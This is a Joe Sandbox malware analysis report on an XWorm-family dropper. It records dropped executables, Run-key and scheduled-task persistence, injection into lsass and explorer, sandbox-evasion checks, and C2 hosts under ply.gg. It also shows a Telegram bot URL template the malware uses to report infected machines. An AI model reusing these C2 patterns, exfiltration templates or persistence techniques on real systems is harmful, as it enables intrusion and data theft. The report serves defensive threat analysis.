                          Source: Yara matchFile source: 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: mIURiU8n2P.exe PID: 2076, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadXClient.exe PID: 5324, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DeadROOTkit.exe PID: 5804, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\Public\DeadXClient.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\Deadsvchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\Public\DeadROOTkit.exe, type: DROPPED
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Disable or Modify Tools                          		1
                          Credential API Hooking                          		1
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Web Service                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts11
                          Native API                          		12
                          Scheduled Task/Job                          		1
                          Access Token Manipulation                          		111
                          Deobfuscate/Decode Files or Information                          		1
                          Input Capture                          		2
                          File and Directory Discovery                          		Remote Desktop Protocol1
                          Credential API Hooking                          		3
                          Ingress Tool Transfer                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter                          		121
                          Registry Run Keys / Startup Folder                          		813
                          Process Injection                          		2
                          Obfuscated Files or Information                          		Security Account Manager34
                          System Information Discovery                          		SMB/Windows Admin Shares1
                          Input Capture                          		21
                          Encrypted Channel                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts12
                          Scheduled Task/Job                          		Login Hook12
                          Scheduled Task/Job                          		1
                          Install Root Certificate                          		NTDS661
                          Security Software Discovery                          		Distributed Component Object Model1
                          Clipboard Data                          		1
                          Non-Standard Port                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          PowerShell                          		Network Logon Script121
                          Registry Run Keys / Startup Folder                          		3
                          Software Packing                          		LSA Secrets2
                          Process Discovery                          		SSHKeylogging3
                          Non-Application Layer Protocol                          		Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                          DLL Side-Loading                          		Cached Domain Credentials151
                          Virtualization/Sandbox Evasion                          		VNCGUI Input Capture14
                          Application Layer Protocol                          		Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          File Deletion                          		DCSync1
                          Application Window Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                          Rootkit                          		Proc Filesystem1
                          System Network Configuration Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                          Masquerading                          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                          Modify Registry                          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd151
                          Virtualization/Sandbox Evasion                          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                          Access Token Manipulation                          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers813
                          Process Injection                          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                          Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                          Hidden Files and Directories                          		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532627 Sample: mIURiU8n2P.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 68 subscribe-bond.gl.at.ply.gg 2->68 70 ip-api.com 2->70 96 Multi AV Scanner detection for domain / URL 2->96 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 36 other signatures 2->102 9 mIURiU8n2P.exe 5 2->9         started        13 powershell.exe 2 15 2->13         started        15 Deadsvchost.exe 2->15         started        17 Deadsvchost.exe 2->17         started        signatures3 process4 file5 60 C:\Users\Public\DeadXClient.exe, PE32 9->60 dropped 62 C:\Users\Public\DeadROOTkit.exe, PE32 9->62 dropped 64 C:\Users\Public\DeadCodeRootKit.exe, PE32 9->64 dropped 66 C:\Users\user\AppData\...\mIURiU8n2P.exe.log, CSV 9->66 dropped 128 Drops PE files to the user root directory 9->128 130 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->130 19 DeadROOTkit.exe 15 8 9->19         started        24 DeadXClient.exe 1 5 9->24         started        26 DeadCodeRootKit.exe 1 9->26         started        132 Writes to foreign memory regions 13->132 134 Modifies the context of a thread in another process (thread injection) 13->134 136 Found suspicious powershell code related to unpacking or dynamic code loading 13->136 138 Injects a PE file into a foreign processes 13->138 28 dllhost.exe 1 13->28         started        30 conhost.exe 13->30         started        140 Antivirus detection for dropped file 15->140 142 Multi AV Scanner detection for dropped file 15->142 144 Machine Learning detection for dropped file 15->144 signatures6 process7 dnsIp8 72 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 19->72 74 api.telegram.org 149.154.167.220, 443, 49739 TELEGRAMRU United Kingdom 19->74 76 updates-full.gl.at.ply.gg 147.185.221.20, 49740, 49838, 49851 SALSGIVERUS United States 19->76 56 C:\Users\user\AppData\Local\DeadROOTkit.exe, PE32 19->56 dropped 104 Antivirus detection for dropped file 19->104 106 Multi AV Scanner detection for dropped file 19->106 108 Protects its processes via BreakOnTermination flag 19->108 122 4 other signatures 19->122 32 powershell.exe 19->32         started        35 powershell.exe 19->35         started        37 Deadsvchost.exe 19->37         started        78 subscribe-bond.gl.at.ply.gg 147.185.221.21, 28600, 49731, 49738 SALSGIVERUS United States 24->78 58 C:\Users\Public\Deadsvchost.exe, PE32 24->58 dropped 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 24->110 112 Machine Learning detection for dropped file 24->112 114 Creates multiple autostart registry keys 24->114 124 2 other signatures 24->124 39 schtasks.exe 24->39         started        116 Injects code into the Windows Explorer (explorer.exe) 28->116 118 Contains functionality to inject code into remote processes 28->118 120 Writes to foreign memory regions 28->120 126 3 other signatures 28->126 41 lsass.exe 28->41 injected 43 svchost.exe 28->43 injected 45 svchost.exe 28->45 injected 48 25 other processes 28->48 file9 signatures10 process11 dnsIp12 86 Loading BitLocker PowerShell Module 32->86 50 conhost.exe 32->50         started        52 conhost.exe 35->52         started        54 conhost.exe 39->54         started        88 Installs new ROOT certificates 41->88 90 Writes to foreign memory regions 41->90 92 System process connects to network (likely due to code injection or exploit) 43->92 80 api.telegram.org 45->80 82 updates-full.gl.at.ply.gg 45->82 84 subscribe-bond.gl.at.ply.gg 45->84 signatures13 94 Uses the Telegram API (likely for C&C communication) 80->94 process14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          mIURiU8n2P.exe74%ReversingLabsByteCode-MSIL.Trojan.IPCheckDCRat
                          mIURiU8n2P.exe67%VirustotalBrowse
                          mIURiU8n2P.exe100%AviraTR/Dropper.Gen2
                          mIURiU8n2P.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\DeadROOTkit.exe100%AviraTR/Spy.Gen
                          C:\Users\Public\DeadXClient.exe100%AviraHEUR/AGEN.1305769
                          C:\Users\Public\DeadCodeRootKit.exe100%AviraTR/Dropper.MSIL.Gen
                          C:\Users\Public\Deadsvchost.exe100%AviraHEUR/AGEN.1305769
                          C:\Users\Public\DeadROOTkit.exe100%AviraTR/Spy.Gen
                          C:\Users\user\AppData\Local\DeadROOTkit.exe100%Joe Sandbox ML
                          C:\Users\Public\DeadXClient.exe100%Joe Sandbox ML
                          C:\Users\Public\DeadCodeRootKit.exe100%Joe Sandbox ML
                          C:\Users\Public\Deadsvchost.exe100%Joe Sandbox ML
                          C:\Users\Public\DeadROOTkit.exe100%Joe Sandbox ML
                          C:\Users\Public\DeadCodeRootKit.exe92%ReversingLabsByteCode-MSIL.Infostealer.Tinba
                          C:\Users\Public\DeadCodeRootKit.exe82%VirustotalBrowse
                          C:\Users\Public\DeadROOTkit.exe88%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          C:\Users\Public\DeadROOTkit.exe64%VirustotalBrowse
                          C:\Users\Public\DeadXClient.exe96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          C:\Users\Public\DeadXClient.exe71%VirustotalBrowse
                          C:\Users\Public\Deadsvchost.exe96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          C:\Users\Public\Deadsvchost.exe71%VirustotalBrowse
                          C:\Users\user\AppData\Local\DeadROOTkit.exe88%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                          C:\Users\user\AppData\Local\DeadROOTkit.exe64%VirustotalBrowse

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          subscribe-bond.gl.at.ply.gg8%VirustotalBrowse
                          updates-full.gl.at.ply.gg4%VirustotalBrowse
                          ip-api.com0%VirustotalBrowse
                          api.telegram.org2%VirustotalBrowse

                          URLs

                          SourceDetectionScannerLabelLink
                          http://nuget.org/NuGet.exe0%URL Reputationsafe
                          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                          https://go.micro0%URL Reputationsafe
                          https://contoso.com/License0%URL Reputationsafe
                          https://contoso.com/Icon0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                          http://schemas.micro0%URL Reputationsafe
                          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                          https://contoso.com/0%URL Reputationsafe
                          https://nuget.org/nuget.exe0%URL Reputationsafe
                          http://ip-api.com0%URL Reputationsafe
                          https://aka.ms/pscore680%URL Reputationsafe
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                          http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                          http://schemas.xmlsoap.org/ws/2004/09/policy0%VirustotalBrowse
                          http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%VirustotalBrowse
                          http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                          https://api.telegram.org1%VirustotalBrowse
                          https://github.com/Pester/Pester1%VirustotalBrowse
                          http://schemas.xmlsoap.org/wsdl/erties0%VirustotalBrowse
                          http://schemas.xmlsoap.org/wsdl/soap12/0%VirustotalBrowse
                          https://api.telegram.org/bot4%VirustotalBrowse
                          http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%VirustotalBrowse
                          subscribe-bond.gl.at.ply.gg8%VirustotalBrowse
                          https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=2%VirustotalBrowse
                          http://docs.oasis-open.org/ws-sx/ws-trust/2005120%VirustotalBrowse
                          http://api.telegram.org2%VirustotalBrowse

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          updates-full.gl.at.ply.gg
                          		147.185.221.20
                          		truetrueunknown
                          subscribe-bond.gl.at.ply.gg
                          		147.185.221.21
                          		truetrueunknown
                          ip-api.com
                          		208.95.112.1
                          		truetrueunknown
                          api.telegram.org
                          		149.154.167.220
                          		truetrueunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A161EDF6F280165B1D298%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Protrue
                            		unknown
                            subscribe-bond.gl.at.ply.ggtrueunknown
                            http://ip-api.com/line/?fields=hostingtrue
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1899586399.0000011113AA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://api.telegram.orgDeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                            https://api.telegram.org/botmIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.drfalseunknown
                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://go.micropowershell.exe, 00000004.00000002.1779642673.0000011104DE4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.25.drfalse
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.microsvchost.exe, 0000001A.00000002.2962138490.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://github.com/Pester/Pesterpowershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                              http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                              https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=%E2%98%A0%20%5BXWorm%20V3.0%DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.msoftPsvchost.exe, 00000016.00000002.3001209327.000001845BB84000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  https://api.telegram.org/botYour_Token/sendMessage?chat_id=Your_ID&text=DeadROOTkit.exe, 00000002.00000002.2956134718.000000000235B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.1786234964.000002DE80229000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081639000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1899586399.0000011113902000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1839365843.000002DE90074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2052291589.000001F091483000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://ip-api.comDeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://aka.ms/pscore68powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 0000000C.00000002.2949177193.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000000.1763357769.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalseunknown
                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 0000000C.00000000.1763228169.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000000C.00000002.2948416778.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://api.telegram.orgDeadROOTkit.exe, 00000002.00000002.2956134718.000000000243F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDeadXClient.exe, 00000001.00000002.2955878706.0000000002901000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1779642673.0000011103891000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1786234964.000002DE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1922708453.000001F081411000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.95.112.1
                                  		ip-api.comUnited States
                                  		53334TUT-ASUStrue
                                  149.154.167.220
                                  		api.telegram.orgUnited Kingdom
                                  		62041TELEGRAMRUtrue
                                  147.185.221.20
                                  		updates-full.gl.at.ply.ggUnited States
                                  		12087SALSGIVERUStrue
                                  147.185.221.21
                                  		subscribe-bond.gl.at.ply.ggUnited States
                                  		12087SALSGIVERUStrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1532627
                                  Start date and time:2024-10-13 19:14:05 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 11m 55s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:20
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:28
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:mIURiU8n2P.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:bd00a7577088b67b52699f956275a3f563d623ca907feeeaee8d2f821d35de40.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@27/83@5/4
                                  EGA Information:
                                  • Successful, ratio: 73.3%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 144
                                  • Number of non-executed functions: 284
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                  • Excluded IPs from analysis (whitelisted): 20.190.152.21, 20.190.152.22, 40.126.24.82, 20.190.152.19, 40.126.24.147, 40.126.24.148, 40.126.24.146, 40.126.24.81
                                  • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                  • Execution Graph export aborted for target DeadXClient.exe, PID 5324 because it is empty
                                  • Execution Graph export aborted for target Deadsvchost.exe, PID 7452 because it is empty
                                  • Execution Graph export aborted for target mIURiU8n2P.exe, PID 2076 because it is empty
                                  • Execution Graph export aborted for target powershell.exe, PID 7176 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  13:15:01API Interceptor54x Sleep call for process: powershell.exe modified
                                  13:15:04API Interceptor44065x Sleep call for process: DeadXClient.exe modified
                                  13:15:37API Interceptor364561x Sleep call for process: winlogon.exe modified
                                  13:15:39API Interceptor275865x Sleep call for process: lsass.exe modified
                                  13:15:40API Interceptor4199x Sleep call for process: svchost.exe modified
                                  13:15:43API Interceptor328384x Sleep call for process: dwm.exe modified
                                  13:15:47API Interceptor262x Sleep call for process: DeadROOTkit.exe modified
                                  13:16:00API Interceptor154x Sleep call for process: spoolsv.exe modified
                                  13:16:12API Interceptor43x Sleep call for process: dllhost.exe modified
                                  18:15:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
                                  18:15:06Task SchedulerRun new task: Deadsvchost path: C:\Users\Public\Deadsvchost.exe
                                  18:15:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Deadsvchost C:\Users\Public\Deadsvchost.exe
                                  18:15:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
                                  18:15:49AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run DeadROOTkit C:\Users\user\AppData\Local\DeadROOTkit.exe
                                  18:15:57AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run DeadROOTkit C:\Users\user\AppData\Local\DeadROOTkit.exe
                                  18:16:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.95.112.180BvHOM51j.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                  • ip-api.com/line/?fields=hosting
                                  sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                  • ip-api.com/json/?fields=225545
                                  s3OBQLA3xR.exeGet hashmaliciousXWormBrowse
                                  • ip-api.com/line/?fields=hosting
                                  W1FREE.exeGet hashmaliciousXWormBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Tracking#1Z379W410424496200.vbsGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  facturas vencidas, 650098, 0099, 00976, 009668, 009678, 0056598433.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Orden de Compra 097890.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  PO.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Purchase_Order.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  4HyAcc2Dct.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  149.154.167.2208svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                    sB2ClgrGng.exeGet hashmaliciousBlank Grabber, XWormBrowse
                                      1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          https://minerva.maine.edu/iii/cas/logout?service=https://www.google.com.sg/url?q=amp/s/couriertrip.com/dist/?#?m=bWFnZHkuZ2lyZ2lzQGNkY3IuY2EuZ292Get hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
                                              SecuriteInfo.com.FileRepMalware.1304.4177.exeGet hashmaliciousUnknownBrowse
